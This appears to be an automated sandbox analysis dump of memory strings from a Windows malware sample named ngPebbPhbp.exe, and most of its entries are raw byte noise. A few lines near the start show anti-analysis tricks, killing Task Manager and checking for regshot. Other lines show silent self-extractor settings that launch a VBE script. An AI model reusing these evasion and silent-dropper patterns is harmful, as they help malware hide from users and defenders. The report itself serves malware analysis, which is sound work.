Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("taskmgr.exe") then memstr_90e183a4-5
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("taskmgr.exe") memstr_bebcb323-0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("regshot.exe") then memstr_5784a0d4-a
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: defaulttabtip-mainui: memstr_a978b269-5
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ((((( h memstr_7f0c42f0-2
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: excel.sheet.8@nt memstr_c7ced7c8-2
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: apphvsiphvs memstr_9496104c-3
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ((((( h memstr_096a2b58-d
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ollate=c;lc_ctype=c;lc_monetary=c;lc_numeric=c;lc_time=c memstr_61589bd2-c
Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ollate=c;lc_ctype=c;lc_monetary=c;lc_numeric=c;lc_time=cq memstr_b3b02830-2
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: setup=rmxb.vbe memstr_665cfb78-2
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tempmode memstr_7e863389-f
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: silent=1 memstr_e1cbc0de-3
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h4~u memstr_ba216905-9
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h${u memstr_02e4e2c3-e
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0| memstr_40750185-0
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0 memstr_8eb40578-9
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2c\t4 memstr_97ed82c2-0
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @c\t4 memstr_76fd42fb-e
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ^c\t4 memstr_2454207e-b
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: richedit20w memstr_5052e667-5
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: swvd8 memstr_dfdffd00-f
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x-5o\ memstr_4f6997ef-3
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c\t4 memstr_d24ff1b4-f
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `hc\t4 memstr_6373d10a-0
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7s45g6a2 memstr_2589be0a-a
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ch4mv6q5 memstr_b63cdb2a-e
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ch4mv6q5p memstr_b32b9968-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736387700.0000000009885000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8y8y` memstr_75a35eae-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tkf91tf3 memstr_2a6f684e-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: q^i[_i memstr_dad3041c-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _i|bi memstr_fad23d2b-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: aiiai3_i memstr_8d23938f-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _ie`ik_iwbi memstr_343cd8ec-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @ppj!j memstr_53402124-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u<@ppj!j memstr_3bd64218-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: us9q4un memstr_020bc78a-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9{dt memstr_10620e7a-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i9{dt memstr_3ebad243-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9{ht memstr_dea981ab-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i9{ht memstr_9b8817df-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wj!j j memstr_4cab02a8-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4)mg; memstr_7a5475b7-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i9|$( memstr_5db8855d-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$,0pw memstr_bef5cbf5-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9|$(t memstr_4997385d-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$,pw memstr_f47f9642-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$,pj memstr_4ad0b7cb-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$\pwhl memstr_e6597ba5-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t$ph+ memstr_d6a8de8f-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$8+d$0j memstr_6260c4b4-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$<+d$4@p memstr_44f1986e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$<+d$4p memstr_3d4de57d-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |$ t"j memstr_a5691dc8-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qqsvw memstr_bd87c039-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ppppp memstr_f02066a6-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$ pj memstr_ba660ce9-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$ pjh3 memstr_84e60165-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$ pjh2 memstr_a047b23e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )mwqw memstr_906c6b60-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 54)mh )mv memstr_e102f225-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivyi}yi memstr_c520a37a-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #msvwt memstr_2198d3b7-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$0vps memstr_86c20ff7-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$8ps memstr_403e2242-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4ps memstr_3294e2cf-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9t$$t memstr_1a4e3689-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4pj memstr_f220c57c-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |$$t@ memstr_4ac238bf-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$0ps memstr_fe384605-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t)m;e memstr_4684017f-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x)m;e memstr_7840ee4f-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *;5p)m memstr_75a18f70-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5p)m3 memstr_fcc9342c-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ^954)m memstr_30f7c86e-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f;54)m memstr_d17741fe-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )mjjj memstr_74bbd215-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gvppppp memstr_87d2faa4-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svjdj memstr_e94bee72-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d@mvsf memstr_a04fa46c-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ppj ppp memstr_35f215e7-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 954)m memstr_b9bcdc27-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 954)m|~ memstr_dc4bc644-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i_^[] memstr_359baa52-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $svw3 memstr_427d63a4-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =l)mt memstr_c82d6d11-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tysvj memstr_09991138-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =l)m^[t memstr_1ed31cbc-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$ pw memstr_b9051bf6-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$$pw memstr_0a37720d-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $)mj, memstr_394b8d4c-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$ x& memstr_881b9d24-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$(pj memstr_c3974008-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t$l;t$ memstr_b27cb9df-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$hpv memstr_6ec6bc9e-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$\pwv memstr_5a9bf1a7-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;|$8}+ memstr_1a288a59-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i;|$8}+ memstr_0fc21994-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$xpj memstr_ceb19b4d-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$xph memstr_ec88c74b-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g;|$< memstr_111ab2dd-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ig;|$< memstr_2df8f133-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p3msp memstr_3ddce68d-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =`)mv memstr_4e5b4a53-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +g<+w@ memstr_eb9a4e56-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$tpvh> memstr_701cd57f-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g4;g\ memstr_623a17dc-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$@pvh memstr_e7303fac-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$|pvhk memstr_96828722-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$(pvh memstr_56cb8e3d-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t$4jh memstr_261d4197-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t$$vq memstr_c093ddbf-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$0ft9 memstr_26bb2d54-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u\pprj memstr_1f204956-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <jjrj memstr_26b6b3f0-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ]jjrj memstr_b7362848-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: djjrj memstr_5d86ec73-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {,9c0~[ memstr_8a380cb0-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c0_^[ memstr_4fb04e57-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j]xf; memstr_527e0c32-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tj\xf;u memstr_fb35553b-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t*j[x memstr_5c30fa71-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @_^[] memstr_4f3a7dda-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: jhx_^[ memstr_966ec868-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4ff9>t memstr_7bbe96ee-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: jwyf; memstr_d7125efa-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: af99t memstr_845dac99-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svwj0_jf+ memstr_08846c0c-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j}^f; memstr_9ac6f405-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j}xf; memstr_67f3ffb8-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n;s|sa memstr_62a062ff-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |$dtn memstr_71111c9a-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9d$<t] memstr_7a360403-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l$ rqr memstr_fa43fb4e-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$$p3 memstr_15bf5f51-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t$ pv3 memstr_578c9d30-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |$dtm memstr_8626f516-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l$$qj memstr_2bbb5304-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #muf9 memstr_f7544af9-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j\^f90ujj memstr_39a88ad3-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f90u;j memstr_90d52313-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >_^[] memstr_45c94236-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l$$vwh memstr_44d8c219-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$@pv memstr_45edc56d-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j%yf9 memstr_50294092-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j\yf9 memstr_9654111a-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l$pvs memstr_4c48702c-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l$lhp memstr_290b74aa-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iwdt[ memstr_ede3e1fc-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wyvjs memstr_95788fc7-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4pv memstr_18c92e97-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j+yj. memstr_e7e33d6f-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~jexf9 memstr_773147ef-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >jeyf; memstr_0a0268d8-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t j-_f; memstr_3e6ca9d0-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _j+y3 memstr_e30613bc-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =h#mvto memstr_64f5bdf4-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =e#muf memstr_ac2a55c6-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4svw3 memstr_2a672b7c-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4jspv memstr_a4b07c82-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$$spv memstr_74750637-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: acting anxv.ppt memstr_19cab26d-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ( wj(,wj memstr_27ea0c43-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,dwj,pwj memstr_76c076a6-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0hwj0twj memstr_1c2f9c29-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |8xjarbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptro memstr_0de08564-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /3:3b3f3l3p3v3`3j3t3 memstr_e8d07c68-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4%4/494c4n4v4z4`4d4j4t4~4 memstr_075a2ae1-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5%5)5/53595c5m5w5b5j5n5t5x5~5 memstr_81360ee1-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6&61696=6c6g6m6w6a6k6v6~6 memstr_c015117e-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7&707:7e7m7q7w7[7a7k7u7 memstr_6db3bd7f-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8 8&8*808:8d8n8y8a8e8k8o8u8 memstr_412b3248-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9(90949:9>9d9n9x9b9m9u9y9 memstr_6789d1f8-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :':1:<:d:h:n:r:x:b:l:v: memstr_b0a3b149-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;!;';1;;;e;p;x;\;b;f;l;v; memstr_9ab808ed-3
